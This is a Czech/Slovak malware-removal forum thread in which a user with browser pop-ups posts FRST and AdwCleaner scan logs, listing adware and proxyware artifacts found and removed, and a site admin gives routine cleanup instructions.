2019-03-13 15:59 - 2019-03-06 11:16 - 000722744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimgapi.dll
2019-03-13 15:59 - 2019-03-06 11:16 - 000527160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimserv.exe
2019-03-13 15:59 - 2019-03-06 11:10 - 000248880 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2019-03-13 15:59 - 2019-03-06 11:07 - 000376120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2019-03-13 15:59 - 2019-03-06 11:04 - 000945464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refsv1.sys
2019-03-13 15:59 - 2019-03-06 11:03 - 001921848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refs.sys
2019-03-13 15:59 - 2019-03-06 11:03 - 000375608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msrpc.sys
2019-03-13 15:59 - 2019-03-06 11:02 - 000626488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2019-03-13 15:59 - 2019-03-06 10:33 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2019-03-13 15:59 - 2019-03-06 10:32 - 000358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\exfat.sys
2019-03-13 15:59 - 2019-03-06 10:31 - 000324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2019-03-13 15:59 - 2019-03-06 10:31 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2019-03-13 15:59 - 2019-03-06 10:26 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\npfs.sys
2019-03-13 15:59 - 2019-03-06 10:26 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msfs.sys
2019-03-13 15:59 - 2019-03-06 10:25 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cdfs.sys
2019-03-13 15:59 - 2019-03-06 08:13 - 000607248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wimgapi.dll
2019-03-13 15:59 - 2019-03-06 07:51 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2019-03-13 15:59 - 2019-02-16 15:02 - 000071176 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2019-03-13 15:59 - 2019-02-16 14:57 - 000506088 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2019-03-13 15:59 - 2019-02-16 14:56 - 000540984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2019-03-13 15:59 - 2019-02-16 14:34 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2019-03-13 15:59 - 2019-02-16 14:31 - 000861184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2019-03-13 15:59 - 2019-02-16 14:30 - 000877568 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2019-03-13 15:59 - 2019-02-16 14:29 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngOnline.dll
2019-03-13 15:59 - 2019-02-16 14:29 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2019-03-13 15:59 - 2019-02-16 14:24 - 000444176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2019-03-13 15:59 - 2019-02-16 14:08 - 000373760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2019-03-13 15:59 - 2019-02-16 14:07 - 000484352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2019-03-13 15:59 - 2019-02-16 14:06 - 000774656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2019-03-13 15:59 - 2019-02-16 14:06 - 000765952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2019-03-13 15:59 - 2019-02-16 14:04 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe
2019-03-13 15:59 - 2019-02-16 10:15 - 000035640 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2019-03-13 15:59 - 2019-02-16 10:05 - 000087800 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskhostw.exe
2019-03-13 15:59 - 2019-02-16 10:04 - 000193032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2019-03-13 15:59 - 2019-02-16 10:02 - 000705848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2019-03-13 15:59 - 2019-02-16 10:02 - 000413712 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 001285424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2019-03-13 15:59 - 2019-02-16 10:01 - 000641984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp_win.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 000335672 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 000161664 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTWorkQ.dll
2019-03-13 15:59 - 2019-02-16 09:51 - 000170952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTWorkQ.dll
2019-03-13 15:59 - 2019-02-16 09:50 - 000504072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp_win.dll
2019-03-13 15:59 - 2019-02-16 09:33 - 000054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialMigrationHandler.dll
2019-03-13 15:59 - 2019-02-16 09:33 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredentialMigrationHandler.dll
2019-03-13 15:59 - 2019-02-16 09:32 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2019-03-13 15:59 - 2019-02-16 09:31 - 000392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2019-03-13 15:59 - 2019-02-16 09:31 - 000126976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srpapi.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 002449408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 001124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdprt.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppLockerCSP.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppLockerCSP.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2019-03-13 15:59 - 2019-02-16 09:28 - 000705024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2019-03-13 15:59 - 2019-02-16 09:28 - 000528384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2019-03-13 15:59 - 2019-02-16 09:27 - 000729088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2019-03-13 15:59 - 2019-02-16 09:26 - 000401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2019-03-13 15:46 - 2019-03-13 15:46 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53647244_241340536814671_4800761078776594432_n.jpg.uid-zps

==================== Three months (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-06-10 16:33 - 2018-03-13 17:09 - 000000000 ____D C:\FRST
2019-06-10 16:13 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-06-10 15:57 - 2018-04-11 23:04 - 000016384 _____ C:\WINDOWS\system32\config\ELAM
2019-06-10 15:56 - 2018-05-30 09:16 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-06-10 15:54 - 2018-04-11 23:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-06-10 15:54 - 2017-12-09 06:22 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2019-06-10 15:54 - 2017-12-09 06:21 - 000065536 _____ C:\WINDOWS\psp_storage.bin
2019-06-10 15:51 - 2018-07-19 14:52 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\uTorrent
2019-06-10 15:51 - 2018-05-30 09:16 - 000003508 _____ C:\WINDOWS\System32\Tasks\DashlaneUpgradeCheck
2019-06-10 15:49 - 2018-02-19 15:26 - 000000000 ____D C:\WINDOWS\system32\Drivers\NGCx64
2019-06-10 15:48 - 2018-05-30 08:56 - 000000000 ____D C:\Users\TATTOO NR
2019-06-10 15:48 - 2017-12-09 18:07 - 000000000 ____D C:\Program Files\Common Files\AV
2019-06-10 15:26 - 2018-07-19 14:53 - 000000000 ____D C:\stahovanie
2019-06-10 15:25 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\GroupPolicy
2019-06-10 14:55 - 2018-05-30 08:50 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-06-10 09:38 - 2017-07-27 22:46 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-06-10 09:36 - 2019-01-05 13:56 - 000002017 _____ C:\Users\TATTOO NR\Desktop\ANYCUBIC Photon Slicer64.lnk
2019-06-10 09:32 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-06-10 09:32 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-06-01 22:31 - 2018-05-30 09:16 - 000004210 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-05-22 09:27 - 2017-12-08 22:37 - 000002305 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-05-22 09:27 - 2017-12-08 22:37 - 000002264 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-05-20 09:16 - 2018-01-12 10:20 - 000000000 ____D C:\Program Files\rempl
2019-05-20 09:13 - 2018-04-12 01:36 - 000000000 ____D C:\WINDOWS\INF
2019-05-20 09:06 - 2018-05-30 09:08 - 000838560 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-05-20 08:58 - 2018-05-30 08:50 - 001383040 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\ShellExperiences
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-05-15 10:16 - 2018-04-12 01:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-05-15 10:03 - 2017-12-09 17:36 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-05-15 09:57 - 2017-12-09 17:35 - 132445408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-05-15 09:15 - 2018-05-30 09:16 - 000003418 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2019-05-15 09:15 - 2018-05-30 09:16 - 000003294 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore

==================== Files in the root of some directories =======

2018-12-12 11:44 - 2018-12-08 14:47 - 000000274 ___SH () C:\Users\TATTOO NR\AppData\Roaming\arcuafh
2018-12-12 11:44 - 2018-12-08 14:47 - 000287232 ___SH () C:\Users\TATTOO NR\AppData\Roaming\wvteeus

==================== FLock =======

2019-06-03 09:38 C:\System Volume Information
2019-06-10 15:53 C:\WINDOWS\windefender.exe
2019-06-10 15:53 C:\WINDOWS\SysWOW64\tijmjrmm

==================== SigCheck ===============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ============================
Přílohy
Addition.zip
(27.38 KiB) Staženo 57 x

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118192
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#2 Příspěvek od Rudy »

Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

kultivate
Návštěvník
Návštěvník
Příspěvky: 4
Registrován: 10 čer 2019 15:53

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#3 Příspěvek od kultivate »

Po restarte PC sa znova otvoril chrome s 2 nahodnimi strankamy (v chrome mam nastavene "Pri spusten->Otvoriť stránku Nová karta")
EDIT - aj ked ho mam spustene sa stale otvaraju

# -------------------------------
# Malwarebytes AdwCleaner 7.3.0.0
# -------------------------------
# Build: 04-04-2019
# Database: 2019-05-27.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 06-10-2019
# Duration: 00:00:13
# OS: Windows 10 Home
# Cleaned: 71
# Failed: 1


***** [ Services ] *****

Deleted WinDefender

***** [ Folders ] *****

Deleted C:\Program Files (x86)\Microleaves
Deleted C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\abb-acer@amazon.com
Deleted C:\Users\Public\App Explorer
Deleted C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc
Deleted C:\Users\TATTOO NR\AppData\Roaming\Microleaves
Deleted C:\Windows\Installer\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Not Deleted C:\Windows\rss

***** [ Files ] *****

Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\App Explorer.lnk
Deleted C:\Windows\Installer\SOURCEHASH{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Deleted C:\Windows\windefender.exe

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted C:\Windows\System32\Tasks\ONLINE APPLICATION V2G1
Deleted C:\Windows\System32\Tasks\ONLINE APPLICATION V2G2
Deleted C:\Windows\System32\Tasks\ONLINE APPLICATION V2G3
Deleted C:\Windows\System32\Tasks\ONLINE APPLICATION V2G4
Deleted C:\Windows\System32\Tasks\ONLINE APPLICATION V2G5
Deleted C:\Windows\System32\Tasks\ONLINE APPLICATION V2G6
Deleted C:\Windows\System32\Tasks\SCHEDULEDUPDATE
Deleted C:\Windows\System32\Tasks\SVC UPDATE
Deleted C:\Windows\System32\Tasks\UPDATER_ONLINE_APPLICATION
Deleted C:\Windows\Tasks\ONLINE APPLICATION V2G1.JOB
Deleted C:\Windows\Tasks\ONLINE APPLICATION V2G2.JOB
Deleted C:\Windows\Tasks\ONLINE APPLICATION V2G3.JOB
Deleted C:\Windows\Tasks\ONLINE APPLICATION V2G4.JOB
Deleted C:\Windows\Tasks\ONLINE APPLICATION V2G5.JOB
Deleted C:\Windows\Tasks\ONLINE APPLICATION V2G6.JOB
Deleted C:\Windows\Tasks\UPDATER_ONLINE_APPLICATION.JOB

***** [ Registry ] *****

Deleted HKCU\Software\EpicNet Inc.
Deleted HKCU\Software\Host App Service
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Run|cloudnet
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted HKCU\Software\SetupCompany
Deleted HKLM\SOFTWARE\MICROSOFT\Speedycar
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{22D95D24-A582-4269-918A-CCCD2A5B9596}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{29998000-B785-492E-9F12-F395A387014A}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34A5794A-F59B-4D30-873D-4342A2E7DB61}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6245CBEF-219F-4FA4-B737-92F7FED1C64F}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{73B52C44-12AA-4C68-9C44-8DE96C64ECEC}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8AE6BCA6-0453-4FF5-9D20-F7D458290143}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B61662CB-0126-40C3-B29F-A425C2E206B6}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD097B1C-2D34-42C2-9C0B-608671510716}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22D95D24-A582-4269-918A-CCCD2A5B9596}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{29998000-B785-492E-9F12-F395A387014A}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34A5794A-F59B-4D30-873D-4342A2E7DB61}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6245CBEF-219F-4FA4-B737-92F7FED1C64F}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72974772-61A0-4DD0-AFCE-E2296D3F36BB}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{73B52C44-12AA-4C68-9C44-8DE96C64ECEC}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8AE6BCA6-0453-4FF5-9D20-F7D458290143}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B61662CB-0126-40C3-B29F-A425C2E206B6}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD097B1C-2D34-42C2-9C0B-608671510716}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G1
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G2
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G3
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G4
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G5
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G6
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SVC Update
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater_Online_Application
Deleted HKLM\Software\Classes\Installer\Features\436F6625D7B77354DBCD89DDC6CFAB1A
Deleted HKLM\Software\Classes\Installer\Products\436F6625D7B77354DBCD89DDC6CFAB1A
Deleted HKLM\Software\MICROSOFT\TechnologyDesktopnew
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\436F6625D7B77354DBCD89DDC6CFAB1A
Deleted HKLM\Software\Wow6432Node\Microleaves
Deleted HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}
Deleted HKU\.DEFAULT\Software\Caphyon\Advanced Updater\{F039D4A9-14D3-4425-A4FA-F2F9D5B0E014}
Deleted HKU\S-1-5-18\Software\Caphyon\Advanced Updater\{F039D4A9-14D3-4425-A4FA-F2F9D5B0E014}
Deleted HKU\S-1-5-19\Software\Host App Service
Deleted HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted HKU\S-1-5-20\Software\Host App Service
Deleted HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

Deleted Amazon Assistant for Firefox

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [8656 octets] - [10/06/2019 17:10:24]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118192
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#4 Příspěvek od Rudy »

OK. Dejte nové logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

kultivate
Návštěvník
Návštěvník
Příspěvky: 4
Registrován: 10 čer 2019 15:53

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#5 Příspěvek od kultivate »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10-06-2019
Ran by TATTOO NR (administrator) on LAPTOP-OQIQCPDD (Acer Nitro AN515-41) (10-06-2019 17:54:15)
Running from C:\Users\TATTOO NR\Downloads
Loaded Profiles: TATTOO NR (Available Profiles: TATTOO NR)
Platform: Windows 10 Home Version 1803 17134.765 (X64) Language: Angličtina (USA)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

( ) [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe
() [File not signed] C:\Program Files (x86)\GLPCCamera\monitorpad.exe
() [File not signed] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
() [File not signed] C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\Video.UI.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Local\App\svchost.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-67RHR.tmp\xjmcc2x5pii.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-LAKTE.tmp\Boutixc.tmp
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(Acer Incorporated -> ) C:\OEM\Preload\FUBService\FUBService.exe
(Acer Incorporated -> Acer Cloud Technology) C:\Program Files\WindowsApps\AcerIncorporated.6245439DEEE9E_1.0.10.0_x86__48frkmn4z8aw4\abPhoto\acer\ccd.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dassault Systemes SolidWorks Corp. -> Dassault Systèmes SolidWorks Corp.) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS\sldworks_fs.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(EpicNet Inc.) [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\csrss\cloudnet.exe
(G%W6R6E3) [File not signed] C:\Program Files\HIXKNY8VO4\HIXKNY8VO.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hot-World GmbH & Co. KG -> ) C:\Program Files (x86)\Repetier-Server\bin\RepetierServer.exe
(MEDIATEK INC. -> Mediatek Inc.) C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry.exe
(MEDIATEK INC. -> Mediatek Inc.) C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry64.exe
(Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) [File not signed] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeApp.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Qualcomm Atheros -> Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\nsWscSvc.exe
(Xerox) [File not signed] C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmdb.exe
